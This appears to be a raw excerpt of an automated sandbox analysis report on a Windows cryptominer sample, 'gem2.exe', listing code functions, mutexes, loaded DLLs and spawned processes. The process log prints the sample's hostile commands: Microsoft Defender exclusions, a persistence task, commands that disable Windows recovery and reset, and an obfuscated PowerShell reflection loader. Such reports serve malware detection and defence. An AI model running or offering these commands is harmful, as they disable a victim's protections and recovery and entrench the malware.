Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D165074417_2_00007FF7D1650744
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D167472417_2_00007FF7D1674724
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D167EA8C17_2_00007FF7D167EA8C
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1687A8817_2_00007FF7D1687A88
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D167DA5017_2_00007FF7D167DA50
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D165FAF817_2_00007FF7D165FAF8
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1675AB417_2_00007FF7D1675AB4
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D166498817_2_00007FF7D1664988
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168196817_2_00007FF7D1681968
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D167492817_2_00007FF7D1674928
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D165C9A817_2_00007FF7D165C9A8
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1657C3017_2_00007FF7D1657C30
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1685C1817_2_00007FF7D1685C18
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1645CEC17_2_00007FF7D1645CEC
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1663CDC17_2_00007FF7D1663CDC
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168DB6017_2_00007FF7D168DB60
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1678B5817_2_00007FF7D1678B58
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D165BB2817_2_00007FF7D165BB28
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1662BFC17_2_00007FF7D1662BFC
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168CBD817_2_00007FF7D168CBD8
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1680BAC17_2_00007FF7D1680BAC
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D165AE8417_2_00007FF7D165AE84
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1651E6C17_2_00007FF7D1651E6C
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168AE2817_2_00007FF7D168AE28
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1686F1017_2_00007FF7D1686F10
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1675EEC17_2_00007FF7D1675EEC
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1690EC017_2_00007FF7D1690EC0
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D165ED1817_2_00007FF7D165ED18
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1658E1017_2_00007FF7D1658E10
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1676DD017_2_00007FF7D1676DD0
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1667D9817_2_00007FF7D1667D98
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D167508817_2_00007FF7D1675088
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D164907717_2_00007FF7D1649077
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168F07017_2_00007FF7D168F070
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D167906417_2_00007FF7D1679064
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D164F01C17_2_00007FF7D164F01C
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168510417_2_00007FF7D1685104
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D165D0DC17_2_00007FF7D165D0DC
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168B0A417_2_00007FF7D168B0A4
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D167AF9017_2_00007FF7D167AF90
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D168CBD817_2_00007FF7D168CBD8
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1668FC717_2_00007FF7D1668FC7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC86DD5831_2_00007FFAAC86DD58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC86F63E31_2_00007FFAAC86F63E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC86DCE531_2_00007FFAAC86DCE5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC86F65931_2_00007FFAAC86F659
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC86FDE931_2_00007FFAAC86FDE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAAC86E32931_2_00007FFAAC86E329
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 31_2_00007FFAACAE96B931_2_00007FFAACAE96B9
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000173D0164A70 appears 478 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000173D019E230 appears 37 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000173D019E2A0 appears 83 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000173D0164B60 appears 330 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000173D0184EB0 appears 39 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000173D01A3D10 appears 31 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000173D0164BB0 appears 52 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000173D01946D0 appears 45 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000173D0164D20 appears 44 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000173D0184D90 appears 42 times
Source: C:\Windows\System32\System-f4855f59e0.exeCode function: String function: 00007FF6A54AC610 appears 42 times
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: String function: 00007FF7D163C610 appears 42 times
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /f
Source: unknownProcess created: Commandline size = 5526
Source: classification engineClassification label: mal100.evad.mine.winEXE@73/18@7/8
Source: C:\Windows\System32\svchost.exeCode function: 16_2_00000173CFC0A920 GetDiskFreeSpaceExW,_invalid_parameter_noinfo_noreturn,16_2_00000173CFC0A920
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeCode function: 17_2_00007FF7D1637ED0 CreateToolhelp32Snapshot,Process32FirstW,Concurrency::details::WorkQueue::IsStructuredEmpty,Concurrency::details::WorkQueue::IsStructuredEmpty,CloseHandle,Process32NextW,CloseHandle,17_2_00007FF7D1637ED0
Source: C:\Windows\SysWOW64\explorer.exeCode function: 25_2_004011AD SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,CoUninitialize,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,25_2_004011AD
Source: C:\Windows\SysWOW64\explorer.exeCode function: 25_2_004017A5 FindResourceA,SizeofResource,LoadResource,LockResource,RegOpenKeyExW,RegSetValueExW,25_2_004017A5
Source: C:\Users\user\Desktop\gem2.exeFile created: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeJump to behavior
Source: C:\Users\user\Desktop\gem2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cGFzdGVzbmFwM[1].txtJump to behavior
Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\f4855f59e0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4716:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5368:120:WilError_03
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeMutant created: \Sessions\1\BaseNamedObjects\Global\e788d6624a
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3312:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1588:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5904:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1548:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
Source: C:\Users\user\Desktop\gem2.exeFile created: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exeJump to behavior
Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
Source: gem2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\gem2.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: gem2.exeReversingLabs: Detection: 52%
Source: gem2.exeVirustotal: Detection: 62%
Source: C:\Users\user\Desktop\gem2.exeFile read: C:\Users\user\Desktop\gem2.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\gem2.exe "C:\Users\user\Desktop\gem2.exe"
Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\System-f4855f59e0.exe C:\Windows\System32\System-f4855f59e0.exe
Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe "C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\powercfg.exe powercfg -change standby-timeout-ac 0
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\powercfg.exe powercfg -change monitor-timeout-ac 0
Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /setacvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 0
Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /setactive SCHEME_CURRENT
Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C reagentc /disable
Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ReAgentc.exe reagentc /disable
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:EtrMmUyKmezi{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lQOtNkEZiwxXMY,[Parameter(Position=1)][Type]$pZbFqViXVD)$sbBqvXXfarI=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'e'+[Char](102)+''+'l'+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+[Char](108)+''+'e'+'ga'+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+'m'+[Char](111)+''+[Char](114)+'y'+[Char](77)+'od'+'u'+'l'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'','C'+'l'+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+'led'+[Char](44)+'A'+[Char](110)+''+[Char](115)+''+'i'+''+'C'+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'to'+'C'+'l'+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$sbBqvXXfarI.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+'c'+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$lQOtNkEZiwxXMY).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$sbBqvXXfarI.DefineMethod(''+'I'+''+[Char](110)+''+'v'+''+'o'+''+[Char](107)+''+'e'+'',''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+'B'+''+'y'+''+[Char](83)+'i'+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+'ot'+[Char](44)+'V'+[Char](105)+''+[Char](114)+'tual',$pZbFqViXVD,$lQOtNkEZiwxXMY).SetImplementationFlags('Ru'+'n'+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $sbBqvXXfarI.CreateType();}$MoLktxqtnxyrW=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+'ns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /f
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exe "C:\Users\user~1\AppData\Local\Temp\WinDrive-f4855f59e0.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery\Configuration" /v REEnable /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery\Configuration" /v REEnable /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C takeown /f C:\Windows\System32\reagentc.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\reagentc.exe
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C icacls C:\Windows\System32\reagentc.exe /grant administrators:F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\reagentc.exe /grant administrators:F
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C icacls C:\Windows\System32\reagentc.exe /deny Everyone:(X)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\reagentc.exe /deny Everyone:(X)
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get serialnumber
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{d5abccfd-b418-4ad6-92a2-7793c4b25dc9}
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get serialnumber
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe "C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\curl.exe curl -s https://api.ipify.org
Source: C:\Windows\System32\curl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"Jump to behavior
Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /FJump to behavior
Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exeJump to behavior
Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\powercfg.exe powercfg -change standby-timeout-ac 0Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\powercfg.exe powercfg -change monitor-timeout-ac 0Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /setacvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 0Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /setactive SCHEME_CURRENTJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C reagentc /disableJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /fJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery\Configuration" /v REEnable /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C takeown /f C:\Windows\System32\reagentc.exeJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C icacls C:\Windows\System32\reagentc.exe /grant administrators:FJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C icacls C:\Windows\System32\reagentc.exe /deny Everyone:(X)Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get serialnumberJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get serialnumberJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\curl.exe curl -s https://api.ipify.orgJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ReAgentc.exe reagentc /disableJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{d5abccfd-b418-4ad6-92a2-7793c4b25dc9}Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableReset /t REG_DWORD /d 1 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Recovery\Configuration" /v REEnable /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f C:\Windows\System32\reagentc.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\reagentc.exe /grant administrators:F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls C:\Windows\System32\reagentc.exe /deny Everyone:(X)
Source: C:\Users\user\Desktop\gem2.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\gem2.exeSection loaded: rasadhlp.dllJump to behavior
